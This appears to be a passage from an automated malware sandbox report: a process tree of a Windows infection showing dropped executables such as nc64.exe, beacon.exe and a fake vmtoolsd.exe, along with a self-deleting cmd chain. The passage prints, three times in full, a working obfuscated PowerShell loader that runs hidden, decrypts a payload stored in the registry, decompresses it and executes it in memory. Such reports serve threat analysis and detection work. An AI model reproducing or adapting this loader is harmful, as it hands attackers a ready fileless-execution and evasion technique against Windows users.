        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $RGTVc1 = New-Object System.Security.Cryptography.AesManaged;$RGTVc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$zKteB = $RGTVc1.('rotpyrceDetaerC'[-1..-15] -join '')();$YJUZY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u3vBDix/Dvzu1bNqIQRl5A==');$YJUZY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY, 0, $YJUZY.Length);$YJUZY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY);$FxgyF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qJmctKqd3cKI9f/LSjUTTZfi7VZWgSF/mV4pnIBCY0=');$FxgyF = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FxgyF, 0, $FxgyF.Length);$FxgyF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FxgyF);$uduqT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a/YRTjsaXrUpzDKih9OVYw==');$uduqT = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uduqT, 0, $uduqT.Length);$uduqT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uduqT);$jXIqy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01OluqzYGp7VpcaRAzTEuhBKHeZhEYzImru7nL0XrpTApAAe2nuJWHtDCVSBiU4K+OqG4TWQCs49ZHgcfWfi+euR/Mv2ayGei2SjeZtJc59djoC9/7q0oIcHnQKO86GNcccbBPnosHT1J0+yqZkcMnDYoec6tOMIX+FO2Q7gJAtiDpsPuQ1nyAKZNxGQcDummAmv3RVg1Zz4Pn9Fqbl08BNtgqWHl2Ol+gU/EEu6csFmcl5KvBGR5yLvJJfHyukRx6NQvUT0kUQI4pvttwYdib8yt2A+olytLLxSrFAtLNYm5BpvCwrWZOPOIQBj0Ji4qnEXnkpW34WQnTRiwcH9iRuPL7yUaopjqEQS9uPzd7cMOFQgqqN4qJxPks+ref0tCg6WdX14j1/i0FPbVy2pENJEdQH7+O7bjFDcgWcQDO4=');$jXIqy = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jXIqy, 0, $jXIqy.Length);$jXIqy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jXIqy);$NrSJK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('syA5EvsXvOKxGBhz+CR86w==');$NrSJK = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NrSJK, 0, $NrSJK.Length);$NrSJK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NrSJK);$hNQmD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wiGRZbwj08s5ccnY2fiFog==');$hNQmD = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hNQmD, 0, $hNQmD.Length);$hNQmD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hNQmD);$DkNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PZgrGVa646VrGOS9G04j/Q==');$DkNHQ = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DkNHQ, 0, $DkNHQ.Length);$DkNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DkNHQ);$UJmpm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WdkCE0NfVCsWgdXTOY/C1g==');$UJmpm = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJmpm, 0, $UJmpm.Length);$UJmpm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJmpm);$XAOdY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gPoDSCGApMCmQB1PvehUTQ==');$XAOdY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XAOdY, 0, $XAOdY.Length);$XAOdY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XAOdY);$YJUZY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qOTGlwNsOu7GjN+WYtV3A==');$YJUZY0 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY0, 0, $YJUZY0.Length);$YJUZY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY0);$YJUZY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oYPFDUYl40yftzDaxfoTSw==');$YJUZY1 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY1, 0, $YJUZY1.Length);$YJUZY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY1);$YJUZY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XXjnNR3Sswka2j4WlAp3TQ==');$YJUZY2 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY2, 0, $YJUZY2.Length);$YJUZY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY2);$YJUZY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BakZq23+iwvKDrU0Eno//w==');$YJUZY3 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY3, 0, $YJUZY3.Length);$YJUZY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY3);$zKteB.Dispose();$RGTVc1.Dispose();$PFTMy = [Microsoft.Win32.Registry]::$UJmpm.$DkNHQ($YJUZY).$hNQmD($FxgyF);$bKVUD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($PFTMy);$RGTVc = New-Object System.Security.Cryptography.AesManaged;$RGTVc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$mDPLY = $RGTVc.('rotpyrceDetaerC'[-1..-15] -join '')();$bKVUD = $mDPLY.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bKVUD, 0, $bKVUD.Length);$mDPLY.Dispose();$RGTVc.Dispose();$WkXXy = New-Object System.IO.MemoryStream(, $bKVUD);$BFsRj = New-Object System.IO.MemoryStream;$eyYzu = New-Object System.IO.Compression.GZipStream($WkXXy, [IO.Compression.CompressionMode]::$YJUZY1);$eyYzu.$XAOdY($BFsRj);$eyYzu.Dispose();$WkXXy.Dispose();$BFsRj.Dispose();$bKVUD = $BFsRj.ToArray();$tHATD = $jXIqy | IEX;$qHSaO = $tHATD::$YJUZY2($bKVUD);$wybTP = $qHSaO.EntryPoint;$wybTP.$YJUZY0($null, (, [string[]] ($uduqT)))
        7⤵
        
        PID:3608
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $RGTVc1 = New-Object System.Security.Cryptography.AesManaged;$RGTVc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$zKteB = $RGTVc1.('rotpyrceDetaerC'[-1..-15] -join '')();$YJUZY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u3vBDix/Dvzu1bNqIQRl5A==');$YJUZY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY, 0, $YJUZY.Length);$YJUZY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY);$FxgyF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qJmctKqd3cKI9f/LSjUTTZfi7VZWgSF/mV4pnIBCY0=');$FxgyF = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FxgyF, 0, $FxgyF.Length);$FxgyF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FxgyF);$uduqT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a/YRTjsaXrUpzDKih9OVYw==');$uduqT = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uduqT, 0, $uduqT.Length);$uduqT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uduqT);$jXIqy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01OluqzYGp7VpcaRAzTEuhBKHeZhEYzImru7nL0XrpTApAAe2nuJWHtDCVSBiU4K+OqG4TWQCs49ZHgcfWfi+euR/Mv2ayGei2SjeZtJc59djoC9/7q0oIcHnQKO86GNcccbBPnosHT1J0+yqZkcMnDYoec6tOMIX+FO2Q7gJAtiDpsPuQ1nyAKZNxGQcDummAmv3RVg1Zz4Pn9Fqbl08BNtgqWHl2Ol+gU/EEu6csFmcl5KvBGR5yLvJJfHyukRx6NQvUT0kUQI4pvttwYdib8yt2A+olytLLxSrFAtLNYm5BpvCwrWZOPOIQBj0Ji4qnEXnkpW34WQnTRiwcH9iRuPL7yUaopjqEQS9uPzd7cMOFQgqqN4qJxPks+ref0tCg6WdX14j1/i0FPbVy2pENJEdQH7+O7bjFDcgWcQDO4=');$jXIqy = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jXIqy, 0, $jXIqy.Length);$jXIqy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jXIqy);$NrSJK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('syA5EvsXvOKxGBhz+CR86w==');$NrSJK = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NrSJK, 0, $NrSJK.Length);$NrSJK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NrSJK);$hNQmD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wiGRZbwj08s5ccnY2fiFog==');$hNQmD = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hNQmD, 0, $hNQmD.Length);$hNQmD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hNQmD);$DkNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PZgrGVa646VrGOS9G04j/Q==');$DkNHQ = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DkNHQ, 0, $DkNHQ.Length);$DkNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DkNHQ);$UJmpm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WdkCE0NfVCsWgdXTOY/C1g==');$UJmpm = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJmpm, 0, $UJmpm.Length);$UJmpm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJmpm);$XAOdY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gPoDSCGApMCmQB1PvehUTQ==');$XAOdY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XAOdY, 0, $XAOdY.Length);$XAOdY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XAOdY);$YJUZY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qOTGlwNsOu7GjN+WYtV3A==');$YJUZY0 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY0, 0, $YJUZY0.Length);$YJUZY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY0);$YJUZY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oYPFDUYl40yftzDaxfoTSw==');$YJUZY1 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY1, 0, $YJUZY1.Length);$YJUZY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY1);$YJUZY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XXjnNR3Sswka2j4WlAp3TQ==');$YJUZY2 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY2, 0, $YJUZY2.Length);$YJUZY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY2);$YJUZY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BakZq23+iwvKDrU0Eno//w==');$YJUZY3 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY3, 0, $YJUZY3.Length);$YJUZY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY3);$zKteB.Dispose();$RGTVc1.Dispose();$PFTMy = [Microsoft.Win32.Registry]::$UJmpm.$DkNHQ($YJUZY).$hNQmD($FxgyF);$bKVUD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($PFTMy);$RGTVc = New-Object System.Security.Cryptography.AesManaged;$RGTVc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$mDPLY = $RGTVc.('rotpyrceDetaerC'[-1..-15] -join '')();$bKVUD = $mDPLY.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bKVUD, 0, $bKVUD.Length);$mDPLY.Dispose();$RGTVc.Dispose();$WkXXy = New-Object System.IO.MemoryStream(, $bKVUD);$BFsRj = New-Object System.IO.MemoryStream;$eyYzu = New-Object System.IO.Compression.GZipStream($WkXXy, [IO.Compression.CompressionMode]::$YJUZY1);$eyYzu.$XAOdY($BFsRj);$eyYzu.Dispose();$WkXXy.Dispose();$BFsRj.Dispose();$bKVUD = $BFsRj.ToArray();$tHATD = $jXIqy | IEX;$qHSaO = $tHATD::$YJUZY2($bKVUD);$wybTP = $qHSaO.EntryPoint;$wybTP.$YJUZY0($null, (, [string[]] ($uduqT)))
        7⤵
        
        PID:864
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $RGTVc1 = New-Object System.Security.Cryptography.AesManaged;$RGTVc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$zKteB = $RGTVc1.('rotpyrceDetaerC'[-1..-15] -join '')();$YJUZY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u3vBDix/Dvzu1bNqIQRl5A==');$YJUZY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY, 0, $YJUZY.Length);$YJUZY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY);$FxgyF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qJmctKqd3cKI9f/LSjUTTZfi7VZWgSF/mV4pnIBCY0=');$FxgyF = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FxgyF, 0, $FxgyF.Length);$FxgyF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FxgyF);$uduqT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a/YRTjsaXrUpzDKih9OVYw==');$uduqT = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uduqT, 0, $uduqT.Length);$uduqT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uduqT);$jXIqy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01OluqzYGp7VpcaRAzTEuhBKHeZhEYzImru7nL0XrpTApAAe2nuJWHtDCVSBiU4K+OqG4TWQCs49ZHgcfWfi+euR/Mv2ayGei2SjeZtJc59djoC9/7q0oIcHnQKO86GNcccbBPnosHT1J0+yqZkcMnDYoec6tOMIX+FO2Q7gJAtiDpsPuQ1nyAKZNxGQcDummAmv3RVg1Zz4Pn9Fqbl08BNtgqWHl2Ol+gU/EEu6csFmcl5KvBGR5yLvJJfHyukRx6NQvUT0kUQI4pvttwYdib8yt2A+olytLLxSrFAtLNYm5BpvCwrWZOPOIQBj0Ji4qnEXnkpW34WQnTRiwcH9iRuPL7yUaopjqEQS9uPzd7cMOFQgqqN4qJxPks+ref0tCg6WdX14j1/i0FPbVy2pENJEdQH7+O7bjFDcgWcQDO4=');$jXIqy = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jXIqy, 0, $jXIqy.Length);$jXIqy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jXIqy);$NrSJK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('syA5EvsXvOKxGBhz+CR86w==');$NrSJK = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NrSJK, 0, $NrSJK.Length);$NrSJK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NrSJK);$hNQmD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wiGRZbwj08s5ccnY2fiFog==');$hNQmD = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hNQmD, 0, $hNQmD.Length);$hNQmD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hNQmD);$DkNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PZgrGVa646VrGOS9G04j/Q==');$DkNHQ = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DkNHQ, 0, $DkNHQ.Length);$DkNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DkNHQ);$UJmpm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WdkCE0NfVCsWgdXTOY/C1g==');$UJmpm = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJmpm, 0, $UJmpm.Length);$UJmpm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJmpm);$XAOdY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gPoDSCGApMCmQB1PvehUTQ==');$XAOdY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XAOdY, 0, $XAOdY.Length);$XAOdY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XAOdY);$YJUZY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qOTGlwNsOu7GjN+WYtV3A==');$YJUZY0 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY0, 0, $YJUZY0.Length);$YJUZY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY0);$YJUZY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oYPFDUYl40yftzDaxfoTSw==');$YJUZY1 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY1, 0, $YJUZY1.Length);$YJUZY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY1);$YJUZY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XXjnNR3Sswka2j4WlAp3TQ==');$YJUZY2 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY2, 0, $YJUZY2.Length);$YJUZY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY2);$YJUZY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BakZq23+iwvKDrU0Eno//w==');$YJUZY3 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY3, 0, $YJUZY3.Length);$YJUZY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY3);$zKteB.Dispose();$RGTVc1.Dispose();$PFTMy = [Microsoft.Win32.Registry]::$UJmpm.$DkNHQ($YJUZY).$hNQmD($FxgyF);$bKVUD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($PFTMy);$RGTVc = New-Object System.Security.Cryptography.AesManaged;$RGTVc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$mDPLY = $RGTVc.('rotpyrceDetaerC'[-1..-15] -join '')();$bKVUD = $mDPLY.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bKVUD, 0, $bKVUD.Length);$mDPLY.Dispose();$RGTVc.Dispose();$WkXXy = New-Object System.IO.MemoryStream(, $bKVUD);$BFsRj = New-Object System.IO.MemoryStream;$eyYzu = New-Object System.IO.Compression.GZipStream($WkXXy, [IO.Compression.CompressionMode]::$YJUZY1);$eyYzu.$XAOdY($BFsRj);$eyYzu.Dispose();$WkXXy.Dispose();$BFsRj.Dispose();$bKVUD = $BFsRj.ToArray();$tHATD = $jXIqy | IEX;$qHSaO = $tHATD::$YJUZY2($bKVUD);$wybTP = $qHSaO.EntryPoint;$wybTP.$YJUZY0($null, (, [string[]] ($uduqT)))
        7⤵
        
        PID:3420
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\a\fortniteselenium.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\a\fortniteselenium.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\a\fortniteselenium.bat.exe"
        6⤵
        
        PID:5628
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /C PING localhost -n 8 >NUL & taskkill /F /IM C:\Users\Admin\AppData\Local\Temp\a\fortniteselenium.bat.exe & ATTRIB -h -s C:\Users\Admin\AppData\Local\Temp\a\fortniteselenium.bat.exe & del /f C:\Users\Admin\AppData\Local\Temp\a\fortniteselenium.bat.exe
        7⤵
        
        PID:5056
        
        C:\Windows\SysWOW64\PING.EXE
        
        PING localhost -n 8
        8⤵
        Runs ping.exe
        
        PID:4856
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM C:\Users\Admin\AppData\Local\Temp\a\fortniteselenium.bat.exe
        8⤵
        Kills process with taskkill
        
        PID:5660
        
        C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -h -s C:\Users\Admin\AppData\Local\Temp\a\fortniteselenium.bat.exe
        8⤵
        Views/modifies file attributes
        
        PID:5008
- C:\Users\Admin\AppData\Local\Temp\a\1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5816
- C:\Users\Admin\AppData\Local\Temp\a\pef.exe
  "C:\Users\Admin\AppData\Local\Temp\a\pef.exe"
  2⤵
  - Executes dropped EXE
  PID:5208
- C:\Users\Admin\AppData\Local\Temp\a\p.exe
  "C:\Users\Admin\AppData\Local\Temp\a\p.exe"
  2⤵
  - Executes dropped EXE
  PID:4616
- C:\Users\Admin\AppData\Local\Temp\a\nc64.exe
  "C:\Users\Admin\AppData\Local\Temp\a\nc64.exe"
  2⤵
  - Executes dropped EXE
  PID:1884
- C:\Users\Admin\AppData\Local\Temp\a\Rar.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Rar.exe"
  2⤵
  - Executes dropped EXE
  PID:5880
- C:\Users\Admin\AppData\Local\Temp\a\win.exe
  "C:\Users\Admin\AppData\Local\Temp\a\win.exe"
  2⤵
  PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
    3⤵
    PID:5628
- C:\Users\Admin\AppData\Local\Temp\a\beacon.exe
  "C:\Users\Admin\AppData\Local\Temp\a\beacon.exe"
  2⤵
  PID:2872
- C:\Users\Admin\AppData\Local\Temp\a\momsstiflersdgjboigfnbio.exe
  "C:\Users\Admin\AppData\Local\Temp\a\momsstiflersdgjboigfnbio.exe"
  2⤵
  PID:5796
- - C:\Users\Admin\AppData\Local\Temp\eoq_cli_dbg\vmtoolsd.exe
    C:\Users\Admin\AppData\Local\Temp\eoq_cli_dbg\vmtoolsd.exe
    3⤵
    PID:5952
  - - C:\Users\Admin\AppData\Roaming\eoq_cli_dbg\vmtoolsd.exe
      "C:\Users\Admin\AppData\Roaming\eoq_cli_dbg\vmtoolsd.exe"
      4⤵
      PID:5284
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        5⤵
        
        PID:5024
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        6⤵
        
        PID:1900
- C:\Users\Admin\AppData\Local\Temp\a\poolsdnkjfdbndklsnfgb.exe
  "C:\Users\Admin\AppData\Local\Temp\a\poolsdnkjfdbndklsnfgb.exe"
  2⤵
  PID:4588
- - C:\Users\Admin\AppData\Local\Temp\Updatemonitor\livecall.exe
    C:\Users\Admin\AppData\Local\Temp\Updatemonitor\livecall.exe
    3⤵
    PID:4152
  - - C:\Users\Admin\AppData\Roaming\Updatemonitor\livecall.exe
      "C:\Users\Admin\AppData\Roaming\Updatemonitor\livecall.exe"
      4⤵
      PID:5892
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        5⤵
        
        PID:4228
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        6⤵
        
        PID:524
- C:\Users\Admin\AppData\Local\Temp\a\tg.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tg.exe"
  2⤵
  PID:4432
- C:\Users\Admin\AppData\Local\Temp\a\Vertex_Craze_20240225061753481.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Vertex_Craze_20240225061753481.exe"
  2⤵
  PID:5380
- - C:\Users\Admin\AppData\Local\Temp\3582-490\Vertex_Craze_20240225061753481.exe
    "C:\Users\Admin\AppData\Local\Temp\3582-490\Vertex_Craze_20240225061753481.exe"
    3⤵
    PID:1860
- C:\Windows\svchost.com
